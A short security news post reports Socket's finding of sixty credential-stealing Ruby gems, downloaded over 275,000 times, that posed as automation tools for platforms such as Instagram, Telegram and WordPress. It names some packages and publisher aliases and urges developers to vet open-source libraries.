60 Malicious Ruby Gems Downloaded 275,000 Times Compromise User Credentials

ByAdmin

Sixty malicious Ruby gems containing credential-stealing code have been downloaded over 275,000 times since March 2023, primarily targeting developer accounts in South Korea. Discovered by Socket, these gems aimed at users of automation tools for platforms such as Instagram, TikTok, Twitter/X, Telegram, Naver, WordPress, and Kakao. RubyGems serves as the official package manager for the Ruby programming language, facilitating the distribution, installation, and management of Ruby libraries, akin to npm for JavaScript or PyPI for Python. The malicious gems were published on RubyGems.org under various aliases, with the offending publishers identified as Zon, Nowon, Kwonsoonje, and Soonje. This strategy of spreading activity across multiple accounts complicates efforts to trace and block the malicious behaviour.

The full list of the malicious packages is available in Socket’s report, which highlights notable cases of deceptively named or typosquatted packages, including WordPress-style automators like Wp_Posting_Duo and Wp_Posting_Zon, as well as Telegram-style bots such as Tg_Send_Duo and Tg_Send_Zon. Each of the 60 gems features a graphical user interface (GUI) that appears legitimate, but they function as phishing tools that exfiltrate user credentials to attackers via hardcoded command-and-control addresses. The harvested data includes usernames, passwords in plaintext, device MAC addresses for fingerprinting, and package names for tracking campaign performance. Some tools even provide fake success or failure messages, misleading users into believing their actions were legitimate. Socket has identified credential logs on Russian-speaking darknet markets linked to these gems, with at least 16 of the malicious Ruby gems still available despite being reported to the RubyGems team. Supply chain attacks on RubyGems are not new, with previous incidents involving typosquatting of legitimate open-source plugins, underscoring the need for developers to scrutinise libraries sourced from open-source repositories for suspicious code and consider the publisher’s reputation and release history. 

Categories: Malicious Ruby Gems, Credential Theft, Phishing Tools 

Tags: Malicious Gems, Credential-Stealing, RubyGems, Phishing Tools, Automation Tools, Typosquatting, Supply Chain Attacks, User Credentials, Command-and-Control, Darknet Markets 

Leave a Reply

Your email address will not be published. Required fields are marked *